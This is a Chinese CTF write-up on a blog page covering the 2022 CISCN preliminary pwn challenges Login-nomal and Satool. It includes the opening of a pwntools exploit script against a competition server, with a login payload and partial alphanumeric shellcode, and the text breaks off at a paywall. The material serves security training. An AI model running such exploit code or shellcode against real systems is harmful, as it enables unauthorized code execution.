2022 CISCN 初赛pwn完整wp

最新推荐文章于 2024-06-10 18:26:28 发布
最新推荐文章于 2024-06-10 18:26:28 发布
阅读量2.2k 收藏 10
点赞数 4
分类专栏: PWN 文章标签: linux pwn llvm
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46483787/article/details/125199780
版权
本文详细介绍了CISCN 2022初赛PWN题目的解题思路,涉及Login-nomal和Satool两个部分。Login-nomal中利用call rdx执行shellcode,通过整型溢出控制堆内存,泄露libc信息。Satool通过分析LLVM PASS,理解其JIT编译IR到shellcode的过程,利用缓冲区溢出和指令限制构造payload,最终实现远程代码执行。
摘要由CSDN通过智能技术生成

把前几天写的wp整理一下合成一篇文章发出来

Login-nomal

先进入root模式然后直接进入backdoor执行shellcode,要求shellcode是可见字符,且是用call rdx调用的,直接AE64生成一下就行

from re import L
from pwn import *
from ctypes import *
from LibcSearcher import *
context.log_level = 'debug'
context.arch='amd64'
#io=process("./pwn")
#io = process(['./pwn'],env={"LD_PRELOAD":"./libc64.so"})
#elf=ELF('./pwn')
io = remote('59.110.24.117',33320)
libc = ELF('./libc-2.33.so')
rl = lambda    a=False        : io.recvline(a)
ru = lambda a,b=True    : io.recvuntil(a,b)
rn = lambda x            : io.recvn(x)
sn = lambda x            : io.send(x)
sl = lambda x            : io.sendline(x)
sa = lambda a,b            : io.sendafter(a,b)
sla = lambda a,b        : io.sendlineafter(a,b)
irt = lambda            : io.interactive()
dbg = lambda text=None  : gdb.attach(io, text)
# lg = lambda s,addr        : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr))
lg = lambda s            : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'\x00'))
uu64 = lambda data        : u64(data.ljust(8, b'\x00'))
#gdb.attach(io,'b*$rebase(0xe64)\nb*$rebase(0xe64)')
payload='opt:1 \nmsg:ro0t\r\n'
shellcode = '''
TAYAXVI31VXPP[_Hc4:14:SX-}/?w-x0An5C+{(P^14:WX-@``?-@??_-|``aP_Hc4:14:SX-]oN}-08/P5;W-vP^14:WX-@``?-@??_-|``aP_Hc4:14:SX-!/o>-uTX 5Xtp(P^14:WX-@``?
最低0.47元/天 解锁文章
Ayakaaaa
关注
专栏目录
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
CISCN初赛wp misc,re,pwn,web,crypto
fivesheeptree的博客
05-20 1167
CISCN初赛wp misc,re,pwn,web,crypto
2022CISCN初赛 WP
Lum1n0us's Blog
05-29 1304
文章目录Crypto签到电台 Crypto 签到电台 在公众号找到提示 在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。 发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。 “弼时安全到达了”所对应的7个电码: 1732 2514 1344 0356 0451 6671 0055 模十算法示例:1732与6378得到7000 发包示例:/sen
2023CISCN部分wp
qq_51862722的博客
05-29 860
2023ciscn部分wp
CISCN 2023 初赛 pwn——Shellwego 题解
CoLin的pwn小屋
05-28 1970
CISCN 2023 初赛 pwn Shellwego题解
CISCN WP ——R3vCr4ck
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
05-28 1015
"flag": "已完成考题,结果正确:flag{deaf73a5-7d79-44c0-b83e-d4f9a114ca86}"分析题目,发现修改程序后的测试程序位于容器内,使用winscp通过scp连接容器,观察分析文件,尝试直接寻找flag文件。Php编写程序,把木马压到zip里面上传,直接上传一句话木马无效,尝试在压缩包里藏一个软链接把文件勾出来,多次尝试后得到。的思路溢出覆盖程序后下两位地址,保证高位地址不发生变化,避免去爆破高位地址。打开之后发现是文件上传,任意传一个文件,
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /...
网鼎杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,网鼎杯2022,白虎组,ctf
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【标题】"baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛" 涉及的是一个信息安全竞赛中的题目,该比赛可能是针对参赛者在网络安全领域,特别是"pwn"类问题解决能力的挑战。"pwn"在黑客术语中通常指的是攻破或...
ciscn_2021_pwny.zip
05-17
2021年全国大学生信息安全竞赛pwn题。
2021第十四届全国大学生信息安全竞赛WPCISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linuxpwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
CISCN国赛--wp
qing_chuan_的博客
05-31 798
第一次参加国赛,我一个小菜鸡,真的纯纯是坐牢。
pwn】[CISCN 2023 初赛]funcanary --爆破canary和pie
question55的博客
11-14 289
拿到程序先查一下保护状态可以发现保护全开,再看一下程序的逻辑可以发现,这里有一个fork函数:C语言中的fork()函数用于创建一个新的进程,该进程是原始进程(父进程)的一个副本。这个副本将从fork()函数之后的代码行开始执行,父进程和子进程在此处分别继续执行不同的代码。fork()函数的返回值有以下三种可能情况:如果返回-1,表示创建新进程失败。 如果返回0,表示当前进程是子进程。 如果返回一个正整数,表示当前进程是父进程,返回的整数是子进程的进程ID。就算说fork函数会开启一个子进程,然后根据whi
2023 ciscn国赛pwn lojin wp
cainiao78777的博客
05-29 2499
第一次参加国赛,被队友带飞了,pwn只做出来了四个,1381分,第16名,总体来说还可以在所有题目中,也是拿到了pwn题login的一血话说回来,来详细说一下,这个pwn题的解法首先就是能看到这是个没附件的pwn题说明只能通过交互去得到信息,再寻找方向,连接之后应该就是这四个选项。
第15届全国大学生知识竞赛 2022ciscn初赛 部分wp
blowed的博客
05-31 1622
Misc ez_usb 1.键盘流量 USB协议数据部分在Leftover Capture Data域中,数据长度为八个字节。其中键盘击键信息集中在第三个字节中。 如图,发现击键信息为0x06,即对应的按键为C 2.鼠标流量 USB协议鼠标数据部分在Leftover Capture Data域中,数据长度为四个字节。 其中第一个字节代表按键,当取0x00时,代表没有按键、为0x01时,代表按左键,为0x02时,代表当前按键为右键。 第二个字节可以看成是一个signed byte类型,
CISCN2024 初赛 wp 部分复现(Re)
最新发布
Pisces50002的博客
06-10 1137
成功率比较玄学,有的版本就不行,我用nexus5x真机也是会崩溃,这里是雷电9.0模拟的OPPO 9。字符串收集信息,可以猜测是利用seed生成randint、random之类的随机数进行了处理。密文长度是56,base64是3->4,转回来flag是42个字符(猜测)借助GPT对几个关键函数进行分析,忽略一些异常处理,看一下主要的逻辑。输入的内容base64编码之后,与通过randint生成的随机数异或。首先是unidbg的环境配置,这个特别麻烦,建议使用。讲的蛮好的,就是挺麻烦,基本功要求高。
ciscn 2022 pwn-newest_note复现
qq_34010404的博客
06-01 731
刚开始有个溢出(太菜了,其他师傅提醒才看出来) del 函数里面 free之后指针没有清0 攻击思路: 如果elf里面使用了stdout,等,那么IO函数里面取到的stdout就是bss段上的stdout,否则就是libc里面的stdout。IO函数位于libc里面,libc里面有一处地方可以泄露elf基址(这段区域是只读的) 考虑alloc到heap数组上,然后修改成员为图中的地址,这样就可以leak elf的地址了(leak之后是为了后面修改free count做准备)。前提是得先leak lib
2022 CISCN 创新能力实践赛初赛WP
Love&Share
05-31 2249
WP来自齐鲁师范学院网络安全社团 文章目录MISCez_usbeverlasting_nightbabydiskWEBEzpoponline_crtPWNlogin-nomalCRY基于挑战码的双向认证1基于挑战码的双向认证2基于挑战码的双向认证2签到电台ISO9798 MISC ez_usb 文件-导出特定分组 tshark -r 2.8.1.pcapng -T fields -e usb.capdat > 2.8.1.txt ​ import os,sys ​ normalKeys = {.
[CISCN 2022 初赛]ezpentest
v2ish1yan的博客
07-25 1199
sql注入:盲注、`utf8mb4_bin`字符集的利用、`case when then else end` 的使用 php混淆解密:phpjiami混淆 php反序列化:原生类、`spl_autoload_register`函数、GC垃圾回收机制的利用
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值